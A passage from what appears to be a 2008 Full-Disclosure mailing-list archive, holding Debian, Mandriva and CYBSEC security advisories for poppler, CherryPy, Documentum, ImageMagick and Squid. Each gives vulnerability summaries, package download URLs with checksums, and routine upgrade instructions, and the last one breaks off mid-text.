upgrade your poppler packages. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian 4.0 (stable) - ------------------- Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/p/poppler/poppler_0.4.5-5.1etch2.diff.gz Size/MD5 checksum: 484246 62ac8891f912e0297dee3bc875497ef7 http://security.debian.org/pool/updates/main/p/poppler/poppler_0.4.5-5.1etch2.dsc Size/MD5 checksum: 749 d12234813b844d590e151f454c7f26fb http://security.debian.org/pool/updates/main/p/poppler/poppler_0.4.5.orig.tar.gz Size/MD5 checksum: 783752 2bb1c75aa3f9c42f0ba48b5492e6d32c alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/p/poppler/libpoppler0c2-qt_0.4.5-5.1etch2_alpha.deb Size/MD5 checksum: 30374 498fdc2dcafa1368c76f22a26243bd18 http://security.debian.org/pool/updates/main/p/poppler/libpoppler0c2-glib_0.4.5-5.1etch2_alpha.deb Size/MD5 checksum: 42932 5c37d6c62ed141bb1ea227e8ed4a02ac http://security.debian.org/pool/updates/main/p/poppler/libpoppler-dev_0.4.5-5.1etch2_alpha.deb Size/MD5 checksum: 774474 25ee5518b1f66bdcab1276ae15104362 http://security.debian.org/pool/updates/main/p/poppler/libpoppler-qt-dev_0.4.5-5.1etch2_alpha.deb Size/MD5 checksum: 33862 97c425d38d2a52013ecb777323fedcbf http://security.debian.org/pool/updates/main/p/poppler/libpoppler-glib-dev_0.4.5-5.1etch2_alpha.deb Size/MD5 checksum: 55184 6a8bc43d21cd7b053e4ff2e96039ecde http://security.debian.org/pool/updates/main/p/poppler/libpoppler0c2_0.4.5-5.1etch2_alpha.deb Size/MD5 checksum: 504400 1873e99c14b49a16a97fa1853840393c http://security.debian.org/pool/updates/main/p/poppler/poppler-utils_0.4.5-5.1etch2_alpha.deb Size/MD5 checksum: 86262 6e9bb738236eb858aa379a011722df5e amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/p/poppler/libpoppler0c2_0.4.5-5.1etch2_amd64.deb Size/MD5 checksum: 456402 b149225663d59f2a71f959c54dc9980a http://security.debian.org/pool/updates/main/p/poppler/poppler-utils_0.4.5-5.1etch2_amd64.deb Size/MD5 checksum: 83490 503a5244ca6778e8934001fcb775863a http://security.debian.org/pool/updates/main/p/poppler/libpoppler-glib-dev_0.4.5-5.1etch2_amd64.deb Size/MD5 checksum: 45932 a4f161401bfa3dd4179e1f06f26ea2fc http://security.debian.org/pool/updates/main/p/poppler/libpoppler-qt-dev_0.4.5-5.1etch2_amd64.deb Size/MD5 checksum: 30518 caea56a87a7f3cbe810912043198944c http://security.debian.org/pool/updates/main/p/poppler/libpoppler-dev_0.4.5-5.1etch2_amd64.deb Size/MD5 checksum: 613524 9f60fe935bf1a0d39cb476306a1cd877 http://security.debian.org/pool/updates/main/p/poppler/libpoppler0c2-qt_0.4.5-5.1etch2_amd64.deb Size/MD5 checksum: 29574 765b2a6179f6de7bcd12577267f28bdc http://security.debian.org/pool/updates/main/p/poppler/libpoppler0c2-glib_0.4.5-5.1etch2_amd64.deb Size/MD5 checksum: 41628 d321bfeef8b4b1646ba1232c2b289e31 arm architecture (ARM) http://security.debian.org/pool/updates/main/p/poppler/libpoppler-qt-dev_0.4.5-5.1etch2_arm.deb Size/MD5 checksum: 30290 ca3b42b4698fd95047d9d01da07c19f0 http://security.debian.org/pool/updates/main/p/poppler/poppler-utils_0.4.5-5.1etch2_arm.deb Size/MD5 checksum: 81660 b5ef96b6267053ef30530742cc7fc885 http://security.debian.org/pool/updates/main/p/poppler/libpoppler0c2-qt_0.4.5-5.1etch2_arm.deb Size/MD5 checksum: 29290 cb56448209be77de26a8ae8370ade5e7 http://security.debian.org/pool/updates/main/p/poppler/libpoppler-dev_0.4.5-5.1etch2_arm.deb Size/MD5 checksum: 594802 ee6c3e505eca8dc598dc5128418d24c3 http://security.debian.org/pool/updates/main/p/poppler/libpoppler-glib-dev_0.4.5-5.1etch2_arm.deb Size/MD5 checksum: 44606 44101c76d6b8148c26ad3e85dd72fe66 http://security.debian.org/pool/updates/main/p/poppler/libpoppler0c2_0.4.5-5.1etch2_arm.deb Size/MD5 checksum: 438018 eb2a802afd0da063c444c0cf2e4a1ed4 http://security.debian.org/pool/updates/main/p/poppler/libpoppler0c2-glib_0.4.5-5.1etch2_arm.deb Size/MD5 checksum: 40054 a1c854be81c453ed1208c7f4f9c2f5eb i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/p/poppler/libpoppler0c2_0.4.5-5.1etch2_i386.deb Size/MD5 checksum: 443352 016dd5a98a0eb335af593d1e51e081d5 http://security.debian.org/pool/updates/main/p/poppler/libpoppler0c2-qt_0.4.5-5.1etch2_i386.deb Size/MD5 checksum: 29378 8d28f47566c6ea599a9d008280d13129 http://security.debian.org/pool/updates/main/p/poppler/poppler-utils_0.4.5-5.1etch2_i386.deb Size/MD5 checksum: 80798 8a05f82badaa6b3f69e86b5ec524b0fa http://security.debian.org/pool/updates/main/p/poppler/libpoppler-glib-dev_0.4.5-5.1etch2_i386.deb Size/MD5 checksum: 44140 e344517322685ec03e9368569b1040ee http://security.debian.org/pool/updates/main/p/poppler/libpoppler0c2-glib_0.4.5-5.1etch2_i386.deb Size/MD5 checksum: 40610 3a31076ff600ff771e68180074b46a21 http://security.debian.org/pool/updates/main/p/poppler/libpoppler-qt-dev_0.4.5-5.1etch2_i386.deb Size/MD5 checksum: 30134 194fbfb244f877cd07b00bc5564a0a30 http://security.debian.org/pool/updates/main/p/poppler/libpoppler-dev_0.4.5-5.1etch2_i386.deb Size/MD5 checksum: 573836 dda4a5aa4e8c0c931bb456daf3e7e38d ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/p/poppler/poppler-utils_0.4.5-5.1etch2_ia64.deb Size/MD5 checksum: 105174 4d21ca486d0dfb96ab111110aea18184 http://security.debian.org/pool/updates/main/p/poppler/libpoppler-dev_0.4.5-5.1etch2_ia64.deb Size/MD5 checksum: 808710 fef48b747551e1f078e51a863db42d64 http://security.debian.org/pool/updates/main/p/poppler/libpoppler0c2-glib_0.4.5-5.1etch2_ia64.deb Size/MD5 checksum: 47680 6c2a9d463679be4d6738009e01d53229 http://security.debian.org/pool/updates/main/p/poppler/libpoppler-qt-dev_0.4.5-5.1etch2_ia64.deb Size/MD5 checksum: 33654 afe0b327c8cde6490cf3982450286911 http://security.debian.org/pool/updates/main/p/poppler/libpoppler-glib-dev_0.4.5-5.1etch2_ia64.deb Size/MD5 checksum: 54716 5aef6fdb1721fd392e7a5b694774fe3f http://security.debian.org/pool/updates/main/p/poppler/libpoppler0c2-qt_0.4.5-5.1etch2_ia64.deb Size/MD5 checksum: 32070 d2981f21f801bd748cf0f429683de327 http://security.debian.org/pool/updates/main/p/poppler/libpoppler0c2_0.4.5-5.1etch2_ia64.deb Size/MD5 checksum: 613062 ddfb7f3ee5899b15576dccf1f7730af5 mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/p/poppler/libpoppler-qt-dev_0.4.5-5.1etch2_mips.deb Size/MD5 checksum: 31838 ee6109e671d1b520e4f0e139ce323d31 http://security.debian.org/pool/updates/main/p/poppler/libpoppler-dev_0.4.5-5.1etch2_mips.deb Size/MD5 checksum: 674630 ced70154cf0bf69de7e3f0682a26efe7 http://security.debian.org/pool/updates/main/p/poppler/libpoppler0c2-qt_0.4.5-5.1etch2_mips.deb Size/MD5 checksum: 29444 80577ad366a7ff024f6bbcfe28e9423e http://security.debian.org/pool/updates/main/p/poppler/poppler-utils_0.4.5-5.1etch2_mips.deb Size/MD5 checksum: 86570 95f59eddb01635867c47ebefdf53148f http://security.debian.org/pool/updates/main/p/poppler/libpoppler0c2_0.4.5-5.1etch2_mips.deb Size/MD5 checksum: 457738 adb74127e8b2f75c08dc4d1140cfcf53 http://security.debian.org/pool/updates/main/p/poppler/libpoppler-glib-dev_0.4.5-5.1etch2_mips.deb Size/MD5 checksum: 50162 a9a20c39b24ffb935dd5c95e58225250 http://security.debian.org/pool/updates/main/p/poppler/libpoppler0c2-glib_0.4.5-5.1etch2_mips.deb Size/MD5 checksum: 41714 9eba45d7741fb6af5defe6cd13aa04b4 mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/p/poppler/libpoppler-qt-dev_0.4.5-5.1etch2_mipsel.deb Size/MD5 checksum: 32068 8f0e573a5d16b9c38647fd35af827f51 http://security.debian.org/pool/updates/main/p/poppler/libpoppler0c2_0.4.5-5.1etch2_mipsel.deb Size/MD5 checksum: 444286 1a9c45b8d5110116e7327379448cb5e5 http://security.debian.org/pool/updates/main/p/poppler/libpoppler-glib-dev_0.4.5-5.1etch2_mipsel.deb Size/MD5 checksum: 49638 67f7ee08100eedef89ce6a10261e4cf3 http://security.debian.org/pool/updates/main/p/poppler/libpoppler0c2-qt_0.4.5-5.1etch2_mipsel.deb Size/MD5 checksum: 29716 d1695e641ec7f2025aed5f3b3092f432 http://security.debian.org/pool/updates/main/p/poppler/libpoppler-dev_0.4.5-5.1etch2_mipsel.deb Size/MD5 checksum: 664980 b521ee4bdbc3f5c063522e14c93a49fb http://security.debian.org/pool/updates/main/p/poppler/libpoppler0c2-glib_0.4.5-5.1etch2_mipsel.deb Size/MD5 checksum: 41074 a4d66ed0588b10960fe40da8e2114aa9 http://security.debian.org/pool/updates/main/p/poppler/poppler-utils_0.4.5-5.1etch2_mipsel.deb Size/MD5 checksum: 86512 25a6b4c4a4a6b1bd8217c5cd7c824554 powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/p/poppler/poppler-utils_0.4.5-5.1etch2_powerpc.deb Size/MD5 checksum: 89176 40cc1c0ddbcb14c1bd88620e4427f2ad http://security.debian.org/pool/updates/main/p/poppler/libpoppler0c2-glib_0.4.5-5.1etch2_powerpc.deb Size/MD5 checksum: 43006 857e0d7a14ac3448d531a6e92badfaa7 http://security.debian.org/pool/updates/main/p/poppler/libpoppler-dev_0.4.5-5.1etch2_powerpc.deb Size/MD5 checksum: 651790 b85508f089275c45426271ab42af5852 http://security.debian.org/pool/updates/main/p/poppler/libpoppler-qt-dev_0.4.5-5.1etch2_powerpc.deb Size/MD5 checksum: 31282 3b991e0a59044ad90bce84dab4a3c286 http://security.debian.org/pool/updates/main/p/poppler/libpoppler-glib-dev_0.4.5-5.1etch2_powerpc.deb Size/MD5 checksum: 48000 0d4dcec8c85e63bf932cba1214e23e8a http://security.debian.org/pool/updates/main/p/poppler/libpoppler0c2_0.4.5-5.1etch2_powerpc.deb Size/MD5 checksum: 472200 5f73beffafb62d0c609a1065e162dbaa http://security.debian.org/pool/updates/main/p/poppler/libpoppler0c2-qt_0.4.5-5.1etch2_powerpc.deb Size/MD5 checksum: 31310 689f8d2507230afdc69b2d967ce6dfc7 s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/p/poppler/libpoppler0c2-glib_0.4.5-5.1etch2_s390.deb Size/MD5 checksum: 41554 d03144f78dde41a7eb0c33ee63436429 http://security.debian.org/pool/updates/main/p/poppler/libpoppler-dev_0.4.5-5.1etch2_s390.deb Size/MD5 checksum: 621764 ac5f100d5a18b4088a00503ad7d27347 http://security.debian.org/pool/updates/main/p/poppler/libpoppler-qt-dev_0.4.5-5.1etch2_s390.deb Size/MD5 checksum: 30430 9f8575a73fa04ca2920ed97d3d30960f http://security.debian.org/pool/updates/main/p/poppler/libpoppler-glib-dev_0.4.5-5.1etch2_s390.deb Size/MD5 checksum: 46690 219c0e56d1ae87c01d984ddce2f576b1 http://security.debian.org/pool/updates/main/p/poppler/libpoppler0c2-qt_0.4.5-5.1etch2_s390.deb Size/MD5 checksum: 29332 e34057f02956439dcd2c1643153a4320 http://security.debian.org/pool/updates/main/p/poppler/poppler-utils_0.4.5-5.1etch2_s390.deb Size/MD5 checksum: 80556 9bf0f20909214d5433c8b6986bd86813 http://security.debian.org/pool/updates/main/p/poppler/libpoppler0c2_0.4.5-5.1etch2_s390.deb Size/MD5 checksum: 453712 471ce86c951154e00d8e5c6e78170915 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/p/poppler/libpoppler0c2_0.4.5-5.1etch2_sparc.deb Size/MD5 checksum: 444208 7108e0818b726a16e46d0fa8c41b3b9b http://security.debian.org/pool/updates/main/p/poppler/libpoppler-glib-dev_0.4.5-5.1etch2_sparc.deb Size/MD5 checksum: 44412 7773d4a704d458419c50e49eb6c2148f http://security.debian.org/pool/updates/main/p/poppler/libpoppler0c2-qt_0.4.5-5.1etch2_sparc.deb Size/MD5 checksum: 29146 9a3e1df71ee09b5b55703673153232c5 http://security.debian.org/pool/updates/main/p/poppler/poppler-utils_0.4.5-5.1etch2_sparc.deb Size/MD5 checksum: 78156 63a833e7ebdb56c067e69aa1a3988ed1 http://security.debian.org/pool/updates/main/p/poppler/libpoppler0c2-glib_0.4.5-5.1etch2_sparc.deb Size/MD5 checksum: 40312 040a74fe179460b0b175e29bc0de26a6 http://security.debian.org/pool/updates/main/p/poppler/libpoppler-dev_0.4.5-5.1etch2_sparc.deb Size/MD5 checksum: 583836 2e40b8be7ad912d86235bd6ff59aeb92 http://security.debian.org/pool/updates/main/p/poppler/libpoppler-qt-dev_0.4.5-5.1etch2_sparc.deb Size/MD5 checksum: 30494 a17ba5f32a555022213133d909dc01aa These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFHqJkNXm3vHE4uyloRAhQ8AJ9ulePBYeJ608Al2+w7dSywS5pu+ACfTVsN QpjR1imAMhG+OyXuNysn60s= =3NL+ -----END PGP SIGNATURE----- From jmm at debian.org Tue Feb 5 17:19:30 2008 From: jmm at debian.org (Moritz Muehlenhoff) Date: Tue, 5 Feb 2008 18:19:30 +0100 Subject: [Full-disclosure] [SECURITY] [DSA 1481-1] New python-cherrypy packages fix denial of service Message-ID: <20080205171930.GA4593@galadriel.inutil.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1481-1 security at debian.org http://www.debian.org/security/ Moritz Muehlenhoff February 05, 2008 http://www.debian.org/security/faq - ------------------------------------------------------------------------ Package : python-cherrypy Vulnerability : missing input sanitising Problem type : remote Debian-specific: no CVE Id(s) : CVE-2008-0252 It was discovered that a directory traversal vulnerability in CherryPy, a pythonic, object-oriented web development framework may lead to denial of service by deleting files through malicious session IDs in cookies. For the stable distribution (etch), this problem has been fixed in version 2.2.1-3etch1. The old stable distribution (sarge) doesn't contain python-cherrypy. We recommend that you upgrade your python-cherrypy packages. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian 4.0 (stable) - ------------------- Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/p/python-cherrypy/python-cherrypy_2.2.1-3etch1.diff.gz Size/MD5 checksum: 5389 f7773f8a66037427df7c33be2dfe7184 http://security.debian.org/pool/updates/main/p/python-cherrypy/python-cherrypy_2.2.1.orig.tar.gz Size/MD5 checksum: 219932 14bf17b0706bc480342cb8fcfaed74cd http://security.debian.org/pool/updates/main/p/python-cherrypy/python-cherrypy_2.2.1-3etch1.dsc Size/MD5 checksum: 824 f425e025b9410c49cd8cd5564aec460a Architecture independent packages: http://security.debian.org/pool/updates/main/p/python-cherrypy/python-cherrypy_2.2.1-3etch1_all.deb Size/MD5 checksum: 220252 b48f9d3a74b1823de85c45c7a30a63c9 These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFHqJpGXm3vHE4uyloRAg33AJ9pZlSwwQ/6ZxkXcbEcad9RpXnpfQCgoEhT hPAtlotdtMGzKVdt+CmKQsQ= =ZFEG -----END PGP SIGNATURE----- From advisories at cybsec.com Tue Feb 5 18:57:18 2008 From: advisories at cybsec.com (CYBSEC Advisories) Date: Tue, 05 Feb 2008 15:57:18 -0300 Subject: [Full-disclosure] CYBSEC Security Advisory: Arbitrary file overwrite in Documentum Administrator / Documentum Webtop Message-ID: <47A8B18E.5010509@cybsec.com> The following pre-advisory is also available in PDF format for download at: http://www.cybsec.com/vuln/CYBSEC-Security_Advisory_Documentum_dmclTrace_Arbitrary_file_overwrite.pdf Advisory Name: Arbitrary file overwrite in Documentum Administrator / Documentum Webtop ============== Vulnerability Class: Arbitrary file overwrite ==================== Release Date: 2008-02-05 ============= Affected Applications: ====================== * Documentum Administrator version 5.3.0.313 * Documentum Webtop version version 5.3.0.317 * Other applications and versions may also be affected Affected Platforms: =================== * Windows 2003 Server - Standard Edition * Apache Tomcat 5.0.28 * Java(TM) 2 Runtime Environment, Standard Edition (build 1.4.2_05-b04) * Other platforms may also be affected Local / Remote: Remote =============== Severity: High ========= Author: Pablo Gaston Milano ======= Vendor Status: Confirmed. Updates Released. ============== Reference to Vulnerability Disclosure Policy: http://www.cybsec.com/vulnerability_policy.pdf ============================================= Vulnerability Description: ========================== Documentum Administrator and Documentum Webtop were found to be vulnerable to arbitrary file overwrite, by specifying an arbitrary filename attribute to the ?dmclTrace.jsp? page. It is also possible to control the contents of the overwritten file, which could allow the remote upload and execution of arbitrary code in the context of the user running the application server. Impact: ======= Exploitation of this vulnerability would allow an attacker to overwrite arbitrary files on the server filesystem. This could be used to upload and execute arbitrary code in the context of the user running the application server. Solution: ========= The vendor reported that this vulnerability was fixed in SP4 and later. Vendor Response: ================ . 2007-12-17: CYBSEC contacted Vendor. . 2007-12-17: Vendor first response. . 2008-01-04: Vendor confirmed vuln is fixed in latest SP. . 2008-01-30: CYBSEC informed the vendor the disclosure plan. . 2008-02-05: Advisory Public Disclosure. Contact Information: ==================== For more information regarding the vulnerability feel free to contact the researcher at pmilano cybsec com. About CYBSEC S.A. Security Systems ----------------------------------- Since 1996 CYBSEC S.A. is devoted exclusively to provide professional services specialized in Computer Security. More than 150 clients around the globe validate our quality and professionalism. To keep objectivity, CYBSEC S.A. does not represent, neither sell, nor is associated with other software and/or hardware provider companies. Our services are strictly focused on Information Security, protecting our clients from emerging security threats, mantaining their IT deployments available, safe, and reliable. Beyond professional services, CYBSEC is continuosly researching new defense and attack techiniques and contributing with the security community with high quality information exchange. For more information, please visit www.cybsec.com (c) 2008 - CYBSEC S.A. Security Systems -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 189 bytes Desc: OpenPGP digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080205/830535d9/attachment.bin From security at mandriva.com Tue Feb 5 21:05:50 2008 From: security at mandriva.com (security at mandriva.com) Date: Tue, 05 Feb 2008 14:05:50 -0700 Subject: [Full-disclosure] [ MDVSA-2008:035 ] - Updated libcdio packages fix DoS vulnerability Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2008:035 http://www.mandriva.com/security/ _______________________________________________________________________ Package : ImageMagick Date : February 5, 2008 Affected: 2007.0, 2007.1, 2008.0, Corporate 4.0 _______________________________________________________________________ Problem Description: Multiple vulnerabilities were discovered in the image decoders of ImageMagick. If a user or automated system were tricked into processing malicious DCM, DIB, XBM, XCF, or XWD images, a remote attacker could execute arbitrary code with user privileges. The updated packages have been patched to correct these issues. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4985 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4986 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4987 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4988 _______________________________________________________________________ Updated Packages: Mandriva Linux 2007.0: f769a6e9cdaac75d8e32961ccb00ff08 2007.0/i586/ImageMagick-6.2.9.2-1.4mdv2007.0.i586.rpm da4ba75fb9c4ce748aca5c9d4a981ccf 2007.0/i586/ImageMagick-doc-6.2.9.2-1.4mdv2007.0.i586.rpm 3f000b9bb25826f2feb3271bee45e241 2007.0/i586/libMagick10.4.0-6.2.9.2-1.4mdv2007.0.i586.rpm 43dc08b50caa2d774fbf1a47056323cd 2007.0/i586/libMagick10.4.0-devel-6.2.9.2-1.4mdv2007.0.i586.rpm ecb1d36c15ded5e24c58e5d2f004a18f 2007.0/i586/perl-Image-Magick-6.2.9.2-1.4mdv2007.0.i586.rpm 66d2627c18ac1f9739f9f1cbac1c704d 2007.0/SRPMS/ImageMagick-6.2.9.2-1.4mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: 093827d07248a9184058e58a9326adb4 2007.0/x86_64/ImageMagick-6.2.9.2-1.4mdv2007.0.x86_64.rpm 41eb637b1d74bc2fdd13d74be6b4d2d6 2007.0/x86_64/ImageMagick-doc-6.2.9.2-1.4mdv2007.0.x86_64.rpm 6eb92f4086601fe1bd59c5c78d5212cf 2007.0/x86_64/lib64Magick10.4.0-6.2.9.2-1.4mdv2007.0.x86_64.rpm 904ab438361927b82cd1af3a2edb5689 2007.0/x86_64/lib64Magick10.4.0-devel-6.2.9.2-1.4mdv2007.0.x86_64.rpm a52a71857fbd66eb3286cc02fc53ceba 2007.0/x86_64/perl-Image-Magick-6.2.9.2-1.4mdv2007.0.x86_64.rpm 66d2627c18ac1f9739f9f1cbac1c704d 2007.0/SRPMS/ImageMagick-6.2.9.2-1.4mdv2007.0.src.rpm Mandriva Linux 2007.1: 048397265fe15565c0017f46c6edf59f 2007.1/i586/ImageMagick-6.3.2.9-5.2mdv2007.1.i586.rpm f35159f3d0b135bacca7948c8560a976 2007.1/i586/ImageMagick-desktop-6.3.2.9-5.2mdv2007.1.i586.rpm 421efc4f8d766e65892058a602538698 2007.1/i586/ImageMagick-doc-6.3.2.9-5.2mdv2007.1.i586.rpm f7bb2a7b08af7b6e6d9a1c6f64b90a51 2007.1/i586/libMagick10.7.0-6.3.2.9-5.2mdv2007.1.i586.rpm 8959a9c4e68049dc11d8f5af614055f1 2007.1/i586/libMagick10.7.0-devel-6.3.2.9-5.2mdv2007.1.i586.rpm bd892771691fe93dc08820d61764ef8e 2007.1/i586/perl-Image-Magick-6.3.2.9-5.2mdv2007.1.i586.rpm 8fbaab01832215fa6c55ca40ea57d98c 2007.1/SRPMS/ImageMagick-6.3.2.9-5.2mdv2007.1.src.rpm Mandriva Linux 2007.1/X86_64: f518fb3ba0af963c13a2723765d4d1e4 2007.1/x86_64/ImageMagick-6.3.2.9-5.2mdv2007.1.x86_64.rpm d038a575f0ec1be2c97d0095a1a38dd4 2007.1/x86_64/ImageMagick-desktop-6.3.2.9-5.2mdv2007.1.x86_64.rpm cc1ca9ea5aeb07ffceec2970ce627393 2007.1/x86_64/ImageMagick-doc-6.3.2.9-5.2mdv2007.1.x86_64.rpm a3056ce5a6817d11066125dd604a3846 2007.1/x86_64/lib64Magick10.7.0-6.3.2.9-5.2mdv2007.1.x86_64.rpm 87e413f954c9f2e867474ad71bb2f521 2007.1/x86_64/lib64Magick10.7.0-devel-6.3.2.9-5.2mdv2007.1.x86_64.rpm 6081067fd5937390438f880e5f8843b9 2007.1/x86_64/perl-Image-Magick-6.3.2.9-5.2mdv2007.1.x86_64.rpm 8fbaab01832215fa6c55ca40ea57d98c 2007.1/SRPMS/ImageMagick-6.3.2.9-5.2mdv2007.1.src.rpm Mandriva Linux 2008.0: 5e253c5a9f2ceeb0a397994fd26e3b8e 2008.0/i586/imagemagick-6.3.2.9-10.1mdv2008.0.i586.rpm 0eb353c910f330df4c17d82110040b12 2008.0/i586/imagemagick-desktop-6.3.2.9-10.1mdv2008.0.i586.rpm d6ba647366c29e3245bc66e0550e3100 2008.0/i586/imagemagick-doc-6.3.2.9-10.1mdv2008.0.i586.rpm b40f88ecdead9517de2c686ba1dc855a 2008.0/i586/libmagick10.7.0-6.3.2.9-10.1mdv2008.0.i586.rpm 2020fd650d271491e4f344981e3e84d5 2008.0/i586/libmagick10.7.0-devel-6.3.2.9-10.1mdv2008.0.i586.rpm 2078c6820e4a1c8af6894c28a5c424d4 2008.0/i586/perl-Image-Magick-6.3.2.9-10.1mdv2008.0.i586.rpm 430b9b4d9374492a1f0068b78f041c46 2008.0/SRPMS/imagemagick-6.3.2.9-10.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 0dde61805f006af26c8bf2bc320cddae 2008.0/x86_64/imagemagick-6.3.2.9-10.1mdv2008.0.x86_64.rpm 07babdb0e17dce223cd023bad4166d2b 2008.0/x86_64/imagemagick-desktop-6.3.2.9-10.1mdv2008.0.x86_64.rpm eb2df961e28bb15c98c30cf5a0f4ab01 2008.0/x86_64/imagemagick-doc-6.3.2.9-10.1mdv2008.0.x86_64.rpm a22e5bba3bb66065dc1fd09d27a7f324 2008.0/x86_64/lib64magick10.7.0-6.3.2.9-10.1mdv2008.0.x86_64.rpm 4cce42552072df0aa696d5e1d98dc213 2008.0/x86_64/lib64magick10.7.0-devel-6.3.2.9-10.1mdv2008.0.x86_64.rpm 0ec8f9a07e18ba0a6395b18d339a2a28 2008.0/x86_64/perl-Image-Magick-6.3.2.9-10.1mdv2008.0.x86_64.rpm 430b9b4d9374492a1f0068b78f041c46 2008.0/SRPMS/imagemagick-6.3.2.9-10.1mdv2008.0.src.rpm Corporate 4.0: ed22991a08651166805a9e00938586fe corporate/4.0/i586/ImageMagick-6.2.4.3-1.7.20060mlcs4.i586.rpm f73279eadd464e2d089b8394c3aa9a54 corporate/4.0/i586/ImageMagick-doc-6.2.4.3-1.7.20060mlcs4.i586.rpm 8ea866751752961c60e9fb82ce3cdeae corporate/4.0/i586/libMagick8.4.2-6.2.4.3-1.7.20060mlcs4.i586.rpm 103f2da262a27b881ca83d24d8997a86 corporate/4.0/i586/libMagick8.4.2-devel-6.2.4.3-1.7.20060mlcs4.i586.rpm 08f572996f4c715f2bdf6f5bd033421a corporate/4.0/i586/perl-Image-Magick-6.2.4.3-1.7.20060mlcs4.i586.rpm d841ebc639506e8f5a0b5b3a8153ce1e corporate/4.0/SRPMS/ImageMagick-6.2.4.3-1.7.20060mlcs4.src.rpm Corporate 4.0/X86_64: f5c88607734d7b484f2b986a72b6d017 corporate/4.0/x86_64/ImageMagick-6.2.4.3-1.7.20060mlcs4.x86_64.rpm 87955e8efd35b03cc9d0c1164af95d50 corporate/4.0/x86_64/ImageMagick-doc-6.2.4.3-1.7.20060mlcs4.x86_64.rpm 2dc943577a1e403ca21630b314cc2ae3 corporate/4.0/x86_64/lib64Magick8.4.2-6.2.4.3-1.7.20060mlcs4.x86_64.rpm 4d9946aed6d478d7010d4df0be341a6c corporate/4.0/x86_64/lib64Magick8.4.2-devel-6.2.4.3-1.7.20060mlcs4.x86_64.rpm 35203cd22455058ef71d0bb2cdd85ad3 corporate/4.0/x86_64/perl-Image-Magick-6.2.4.3-1.7.20060mlcs4.x86_64.rpm d841ebc639506e8f5a0b5b3a8153ce1e corporate/4.0/SRPMS/ImageMagick-6.2.4.3-1.7.20060mlcs4.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.8 (GNU/Linux) iD8DBQFHqKRtmqjQ0CJFipgRAkxWAJsEU3Unei2S1KERdXveRi5AvKfv+QCgjJbL edrPn6Pt9si2fUOk5TVr92I= =H18V -----END PGP SIGNATURE----- From jmm at debian.org Tue Feb 5 22:40:10 2008 From: jmm at debian.org (Moritz Muehlenhoff) Date: Tue, 5 Feb 2008 23:40:10 +0100 Subject: [Full-disclosure] [SECURITY] [DSA 1482-1] New squid packages fix denial of service Message-ID: <20080205224010.GA4584@galadriel.inutil.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1482-1 security at debian.org http://www.debian.org/security/ Moritz Muehlenhoff February 05, 2008 http://www.debian.org/security/faq - ------------------------------------------------------------------------ Package : squid Vulnerability : programming error Problem type : remote Debian-specific: no CVE Id(s) : CVE-2007-6239 It was discovered that malformed cache update replies against the Squid WWW proxy cache could lead to the exhaustion of system memory, resulting in potential denial of service. For the stable distribution (etch), this problem has been fixed in version 2.6.5-6etch1. For the old stable distribution (sarge), the update cannot currently be processed on the buildd security network due to a bug in the archive management script. This will be resolved soon. An update for i386 is temporarily available at at http://people.debian.org/~jmm/squid/. We recommend that you upgrade your squid packages. Upgrade instructions - -------------------- wget url will 